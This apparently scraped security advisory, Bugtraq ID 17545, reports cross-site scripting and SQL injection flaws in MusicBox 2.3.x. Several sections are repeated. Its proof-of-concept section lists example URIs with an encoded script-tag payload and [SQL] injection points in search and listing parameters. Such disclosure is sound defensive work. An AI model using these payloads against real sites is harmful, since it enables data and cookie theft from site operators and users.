MusicBox Multiple Input Validation Vulnerabilities
BID:17545
Info
MusicBox Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 17545 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 17 2006 12:00AM |
| Updated: | Jul 24 2006 11:07PM |
| Credit: | r0t is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
MusicBox MusicBox 2.3.4 MusicBox MusicBox 2.3.3 MusicBox MusicBox 2.3 Beta 2 MusicBox MusicBox 2.3 |
| Not Vulnerable: | |
Discussion
MusicBox Multiple Input Validation Vulnerabilities
MusicBox is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
MusicBox is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
Exploit / POC
MusicBox Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?in=song&term=%22%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&action=search&start=0
http://www.example.com/index.php?in=song&term=r0t&action=search&start=[SQL]
http://www.example.com/index.php?action=top&show=10&type=[SQL]
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?in=song&term=%22%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&action=search&start=0
http://www.example.com/index.php?in=song&term=r0t&action=search&start=[SQL]
http://www.example.com/index.php?action=top&show=10&type=[SQL]
Solution / Fix
MusicBox Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
MusicBox Multiple Input Validation Vulnerabilities
References:
References:
- Musicbox vuln (r0t)
- Vendor Homepage (Gonafish)
- MusicBox <= 2.3.4 XSS SQL injection Vulnerability (Ellipsis Security)